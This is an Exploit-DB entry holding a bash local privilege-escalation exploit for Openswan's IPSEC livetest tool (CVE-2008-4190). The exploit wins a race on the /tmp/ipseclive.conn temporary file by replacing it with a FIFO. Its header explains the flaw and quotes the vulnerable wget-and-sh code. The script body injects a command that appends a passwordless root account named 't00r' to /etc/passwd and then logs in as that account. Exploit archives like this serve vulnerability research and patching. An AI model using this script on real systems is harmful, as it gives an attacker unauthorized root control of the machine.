Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation

EDB-ID:

9135

Author:

nofame

Type:

local

Platform:

Linux

Published:

2009-07-13

#!/bin/bash
# uglyswan - OpenSwan local root exploit (CVE-2008-4190)
#
# description:
# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16,
# allows local users to overwrite arbitrary files and execute arbitrary code via a
# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files.
# NOTE: in many distributions and the upstream version, this tool has been disabled.
#
# vulnerable code:
# wget -o /dev/null  -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version"
# sh < /tmp/ipseclive.conn
#
# the exploit:
# cat waits for the input from wget to the fifo and after it received it, you
# immediately echo your command into the fifo which was empty again and viola, it
# gets executed, because the sh binary needs a few milliseconds to get loaded,
# it's a typical race condition.
# 
# problem:
# you need to trick root to execute "ipsec livetest", and this script needs to run in background...
#
# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks
#

mkfifo /tmp/ipseclive.conn
cat /tmp/ipseclive.conn
echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn
rm /tmp/ipseclive.conn
su -l t00r

# milw0rm.com [2009-07-13]